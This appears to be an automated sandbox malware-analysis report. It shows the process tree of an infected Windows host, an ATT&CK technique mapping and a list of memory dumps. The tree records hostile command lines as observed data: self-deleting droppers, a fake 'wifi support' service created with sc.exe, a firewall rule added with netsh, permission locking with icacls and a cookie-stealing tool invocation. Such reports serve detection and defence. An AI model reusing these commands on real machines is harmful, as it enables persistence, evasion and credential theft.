"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5832

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:808

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6228

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2980

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\fef041547bd64dd29eeb7fa850a7283f /t 0 /p 5528
1⤵
PID:1156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7420

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7944

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6356
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{14d0b1ce-2622-1b4a-aafe-476cd51e972f}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:1772
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"
  2⤵
  PID:7788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7972

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7924

C:\Users\Admin\AppData\Local\Temp\8F18.exe
C:\Users\Admin\AppData\Local\Temp\8F18.exe
1⤵
PID:5756
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:5296
- C:\Users\Admin\AppData\Local\Temp\8F18.exe
  "C:\Users\Admin\AppData\Local\Temp\8F18.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  PID:6708
- - C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin2.exe
    "C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin2.exe"
    3⤵
    PID:4492
- - C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin1.exe
    "C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin1.exe"
    3⤵
    PID:4044
- - C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe
    "C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe"
    3⤵
    PID:5380
  - - C:\Windows\SysWOW64\cmd.exe
      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\updatewin.exe
      4⤵
      PID:6352
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:8032
- - C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\5.exe
    "C:\Users\Admin\AppData\Local\a280c20e-bf60-4234-ba51-112f5553ed79\5.exe"
    3⤵
    PID:6124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 852
      4⤵
      Program crash
      PID:5944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 856
      4⤵
      Program crash
      PID:4448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 980
      4⤵
      Program crash
      PID:5792
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 984
      4⤵
      Program crash
      PID:6020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1104
      4⤵
      Program crash
      PID:7644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1184
      4⤵
      Program crash
      PID:6768
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1264
      4⤵
      Program crash
      PID:4504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1352
      4⤵
      Program crash
      PID:5172

C:\Users\Admin\AppData\Local\Temp\D2F8.exe
C:\Users\Admin\AppData\Local\Temp\D2F8.exe
1⤵
PID:5492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo dbvicTgbw
  2⤵
  PID:7716
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx
  2⤵
  PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:6172

C:\Users\Admin\AppData\Local\Temp\5D0.exe
C:\Users\Admin\AppData\Local\Temp\5D0.exe
1⤵
PID:5376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5D0.exe"
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:6460

C:\Users\Admin\AppData\Local\Temp\1C76.exe
C:\Users\Admin\AppData\Local\Temp\1C76.exe
1⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\3733.exe
C:\Users\Admin\AppData\Local\Temp\3733.exe
1⤵
PID:5336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\izjapjig\
  2⤵
  PID:156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\llmxstrz.exe" C:\Windows\SysWOW64\izjapjig\
  2⤵
  PID:5840
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create izjapjig binPath= "C:\Windows\SysWOW64\izjapjig\llmxstrz.exe /d\"C:\Users\Admin\AppData\Local\Temp\3733.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:4888
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description izjapjig "wifi internet conection"
  2⤵
  PID:7704
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start izjapjig
  2⤵
  PID:8156
- C:\Users\Admin\cexipxlb.exe
  "C:\Users\Admin\cexipxlb.exe" /d"C:\Users\Admin\AppData\Local\Temp\3733.exe"
  2⤵
  PID:7352
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hyubsrvz.exe" C:\Windows\SysWOW64\izjapjig\
    3⤵
    PID:8168
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" config izjapjig binPath= "C:\Windows\SysWOW64\izjapjig\hyubsrvz.exe /d\"C:\Users\Admin\cexipxlb.exe\""
    3⤵
    PID:6416
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start izjapjig
    3⤵
    PID:7512
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1026.bat" "
    3⤵
    PID:684
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:7672

C:\Users\Admin\AppData\Local\Temp\5AD9.exe
C:\Users\Admin\AppData\Local\Temp\5AD9.exe
1⤵
PID:7676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6824

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\74DA.exe
C:\Users\Admin\AppData\Local\Temp\74DA.exe
1⤵
PID:1744
- C:\Users\Admin\AppData\Local\Temp\74DA.exe
  C:\Users\Admin\AppData\Local\Temp\74DA.exe
  2⤵
  PID:5480

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:8176
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:2908

C:\Users\Admin\AppData\Local\Temp\944A.exe
C:\Users\Admin\AppData\Local\Temp\944A.exe
1⤵
PID:4224
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:4416
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:2036

C:\Users\Admin\AppData\Local\Temp\ACC5.exe
C:\Users\Admin\AppData\Local\Temp\ACC5.exe
1⤵
PID:7268

C:\Users\Admin\AppData\Local\Temp\D136.exe
C:\Users\Admin\AppData\Local\Temp\D136.exe
1⤵
PID:2112
- C:\Users\Admin\AppData\Local\Temp\D136.exe
  "C:\Users\Admin\AppData\Local\Temp\D136.exe"
  2⤵
  PID:8040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7792

C:\Users\Admin\AppData\Local\Temp\E125.exe
C:\Users\Admin\AppData\Local\Temp\E125.exe
1⤵
PID:7204
- C:\Users\Admin\AppData\Local\Temp\is-J6CBV.tmp\E125.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-J6CBV.tmp\E125.tmp" /SL5="$B02AC,300262,216576,C:\Users\Admin\AppData\Local\Temp\E125.exe"
  2⤵
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\is-E3NB4.tmp\ST.exe
    "C:\Users\Admin\AppData\Local\Temp\is-E3NB4.tmp\ST.exe" /S /UID=lab212
    3⤵
    PID:5520
  - - C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe
      "C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe" /VERYSILENT
      4⤵
      PID:644
    - - C:\Users\Admin\AppData\Local\Temp\is-LH8P7.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LH8P7.tmp\prolab.tmp" /SL5="$901F4,575243,216576,C:\Program Files\Windows Sidebar\UBILTDMKNA\prolab.exe" /VERYSILENT
        5⤵
        
        PID:7504
  - - C:\Users\Admin\AppData\Local\Temp\6a-bcf65-201-9e781-19afa8e4af5e6\Bazhebiqufe.exe
      "C:\Users\Admin\AppData\Local\Temp\6a-bcf65-201-9e781-19afa8e4af5e6\Bazhebiqufe.exe"
      4⤵
      PID:2084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exe & exit
        5⤵
        
        PID:4316
      - C:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\zape21rf.dei\joggaplayer.exe
        6⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:3480
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exe & exit
        5⤵
        
        PID:5344
      - C:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exe
        
        C:\Users\Admin\AppData\Local\Temp\3hirjrmq.h5r\proxybot.exe
        6⤵
        
        PID:7472
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        7⤵
        
        PID:7164
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exe & exit
        5⤵
        
        PID:5688
      - C:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exe
        
        C:\Users\Admin\AppData\Local\Temp\1mfcfka5.12z\ra4vpn.exe
        6⤵
        
        PID:7524

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5664

C:\Users\Admin\AppData\Local\Temp\F858.exe
C:\Users\Admin\AppData\Local\Temp\F858.exe
1⤵
PID:5436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\3DE8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3DE8.tmp.exe
1⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\4FBC.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4FBC.tmp.exe
1⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\5A9A.tmp.exe
C:\Users\Admin\AppData\Local\Temp\5A9A.tmp.exe
1⤵
PID:5588

C:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba\8F18.exe
C:\Users\Admin\AppData\Local\1a256071-054d-4356-b1ff-16b9a76678ba\8F18.exe --Task
1⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\78D1.tmp.exe
C:\Users\Admin\AppData\Local\Temp\78D1.tmp.exe
1⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\7EFD.tmp.exe
C:\Users\Admin\AppData\Local\Temp\7EFD.tmp.exe
1⤵
PID:2280

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4076

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5892

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7632

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7988

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7824

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8180

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5400

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5620

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\B07D.exe
C:\Users\Admin\AppData\Local\Temp\B07D.exe
1⤵
PID:6232

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Scripting

T1064

Persistence

Bootkit

T1067

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

Modify Registry

Scripting

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/428-218-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/428-207-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/428-238-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/428-234-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/428-231-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/428-224-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/428-227-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/428-230-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/428-210-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/428-213-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/428-217-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/428-220-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/428-194-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/428-209-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/428-191-0x0000000003931000-0x000000000395C000-memory.dmp

Filesize
172KB

Download
memory/428-198-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/428-199-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/428-206-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/428-204-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/428-202-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/696-203-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/720-92-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/720-69-0x0000000000B20000-0x0000000000B2D000-memory.dmp

Filesize
52KB

Download
memory/1100-185-0x0000000000401000-0x0000000000417000-memory.dmp

Filesize
88KB

Download
memory/1516-38-0x00000000030A0000-0x000000000318F000-memory.dmp

Filesize
956KB

Download
memory/1516-45-0x00000000007C0000-0x00000000007DB000-memory.dmp

Filesize
108KB

Download
memory/1516-24-0x0000000002710000-0x00000000028AC000-memory.dmp

Filesize
1.6MB

Download
memory/1744-792-0x0000000000030000-0x000000000003D000-memory.dmp

Filesize
52KB

Download
memory/1744-790-0x0000000003120000-0x0000000003121000-memory.dmp

Filesize
4KB

Download
memory/1780-943-0x00000188F0D30000-0x00000188F0D39000-memory.dmp

Filesize
36KB

Download
memory/1780-917-0x00007FFE3D237DF0-0x00007FFE3D237DFE-memory.dmp

Filesize
14B

Download
memory/1780-936-0x00007FFE3D237DF0-0x00007FFE3D237DFE-memory.dmp

Filesize
14B

Download
memory/1780-940-0x00000188F0D40000-0x00000188F0D41000-memory.dmp

Filesize
4KB

Download
memory/1780-932-0x00000188F0D30000-0x00000188F0D31000-memory.dmp

Filesize
4KB

Download
memory/2052-68-0x0000000002B00000-0x0000000002B02000-memory.dmp

Filesize
8KB

Download
memory/2052-65-0x0000000002B10000-0x00000000034B0000-memory.dmp

Filesize
9.6MB

Download
memory/2084-852-0x0000000002635000-0x0000000002636000-memory.dmp

Filesize
4KB

Download
memory/2084-845-0x0000000002640000-0x0000000002FE0000-memory.dmp

Filesize
9.6MB

Download
memory/2084-847-0x0000000002630000-0x0000000002632000-memory.dmp

Filesize
8KB

Download
memory/2084-850-0x0000000002632000-0x0000000002634000-memory.dmp

Filesize
8KB

Download
memory/2112-842-0x0000000003700000-0x0000000003F02000-memory.dmp

Filesize
8.0MB

Download
memory/2112-840-0x0000000000400000-0x0000000000C1B000-memory.dmp

Filesize
8.1MB

Download
memory/2112-839-0x0000000003700000-0x0000000003701000-memory.dmp

Filesize
4KB

Download
memory/2112-843-0x0000000000400000-0x0000000000C1B000-memory.dmp

Filesize
8.1MB

Download
memory/2188-544-0x0000026B67130000-0x0000026B671300F8-memory.dmp

Filesize
248B

Download
memory/2188-538-0x0000026B67130000-0x0000026B671300F8-memory.dmp

Filesize
248B

Download
memory/2188-533-0x0000026B67130000-0x0000026B671300F8-memory.dmp

Filesize
248B

Download
memory/2216-186-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/2228-664-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/2228-662-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/2228-663-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/2264-493-0x0000000072BC0000-0x0000000072C53000-memory.dmp

Filesize
588KB

Download
memory/2280-946-0x0000000003150000-0x0000000003151000-memory.dmp

Filesize
4KB

Download
memory/2348-445-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2348-447-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2460-814-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/2640-381-0x0000000000400000-0x0000000000C77000-memory.dmp

Filesize
8.5MB

Download
memory/2640-379-0x0000000000400000-0x0000000000C77000-memory.dmp

Filesize
8.5MB

Download
memory/2640-378-0x0000000003760000-0x0000000003FBD000-memory.dmp

Filesize
8.4MB

Download
memory/2640-377-0x0000000003760000-0x0000000003761000-memory.dmp

Filesize
4KB

Download
memory/2688-23-0x0000000072BC0000-0x0000000072C53000-memory.dmp

Filesize
588KB

Download
memory/2688-31-0x0000000010000000-0x000000001033E000-memory.dmp

Filesize
3.2MB

Download
memory/2908-858-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-863-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-876-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-880-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-871-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-857-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/2908-872-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/2908-873-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2908-859-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/2908-860-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2984-841-0x0000000002D40000-0x0000000002D56000-memory.dmp

Filesize
88KB

Download
memory/2984-805-0x0000000002F40000-0x0000000002F57000-memory.dmp

Filesize
92KB

Download
memory/2984-545-0x0000000005430000-0x0000000005446000-memory.dmp

Filesize
88KB

Download
memory/2984-529-0x0000000004CF0000-0x0000000004D06000-memory.dmp

Filesize
88KB

Download
memory/2984-373-0x0000000000E80000-0x0000000000E96000-memory.dmp

Filesize
88KB

Download
memory/3228-63-0x00000000035D0000-0x0000000003A7F000-memory.dmp

Filesize
4.7MB

Download
memory/3228-46-0x0000000072BC0000-0x0000000072C53000-memory.dmp

Filesize
588KB

Download
memory/3668-773-0x0000000140000000-0x000000014072E000-memory.dmp

Filesize
7.2MB

Download
memory/3668-774-0x0000000140000000-0x000000014072E000-memory.dmp

Filesize
7.2MB

Download
memory/3668-772-0x000001DF320F0000-0x000001DF32104000-memory.dmp

Filesize
80KB

Download
memory/3668-806-0x000001DF32130000-0x000001DF32150000-memory.dmp

Filesize
128KB

Download
memory/3668-768-0x0000000140000000-0x000000014072E000-memory.dmp

Filesize
7.2MB

Download
memory/3776-43-0x0000000072BC0000-0x0000000072C53000-memory.dmp

Filesize
588KB

Download
memory/3776-58-0x0000000003620000-0x0000000003ACF000-memory.dmp

Filesize
4.7MB

Download
memory/3912-331-0x0000000004510000-0x0000000004511000-memory.dmp

Filesize
4KB

Download
memory/3940-30-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/3940-25-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/3968-56-0x000000001BFC0000-0x000000001BFC2000-memory.dmp

Filesize
8KB

Download
memory/3968-83-0x0000024F3AA00000-0x0000024F3AA01000-memory.dmp

Filesize
4KB

Download
memory/3968-51-0x00007FFE1FD00000-0x00007FFE206EC000-memory.dmp

Filesize
9.9MB

Download
memory/3968-79-0x00007FFE37D90000-0x00007FFE37E0E000-memory.dmp

Filesize
504KB

Download
memory/3968-80-0x0000000010000000-0x0000000010057000-memory.dmp

Filesize
348KB

Download
memory/3968-52-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/4044-775-0x0000000002100000-0x0000000002101000-memory.dmp

Filesize
4KB

Download
memory/4076-907-0x0000000003270000-0x00000000032E4000-memory.dmp

Filesize
464KB

Download
